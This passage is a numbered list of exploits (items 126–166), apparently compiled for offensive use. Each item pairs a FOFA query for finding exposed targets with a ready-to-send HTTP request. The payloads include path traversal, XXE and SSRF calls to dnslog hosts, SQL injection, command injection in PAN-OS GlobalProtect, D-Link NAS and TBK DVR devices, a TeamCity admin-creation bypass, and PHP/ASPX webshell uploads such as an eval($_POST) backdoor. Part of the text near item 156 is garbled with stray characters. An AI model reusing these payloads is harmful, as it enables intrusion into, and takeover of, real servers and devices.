After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (科立讯) communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (科立讯) communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (科立讯) communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (科立讯) communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd to a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell (天维尔) fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file at http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 操作系统命令注入
) j( {5 y& ?- s! {CVE-2024-3721
* _, C4 {. _& pFOFA:"Location: /login.rsp"0 t4 x& N* m9 u, P/ Z
·TBK DVR-4104
7 T3 B3 G& n  t4 ?8 `4 z! |·TBK DVR-4216
( o: {& A" }. W8 q9 U+ Ycurl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"0 p+ s0 N7 z& V6 `# g! c

7 C1 s0 R( o  \- z  G! F! X
/ n/ N) d* {2 z6 t* l0 H# c$ C; J# aPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1- ?! J6 a& E7 M& R: ?# v, i: Y; z
Host: x.x.x.x4 A: Y% s2 X% ]0 z" s
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, J5 p$ ~& J4 y) P& L& j: B
Connection: close
! u: d" @. y6 V1 ^# i4 Q; i8 Z7 bContent-Length: 0
+ Q, \! F# b- `1 x, RCookie: uid=15 `7 }5 x3 X% w7 A0 T# {! h
Accept-Encoding: gzip
$ q9 r  _% m0 _/ K- s% Y: ]7 S* d

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field carries the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
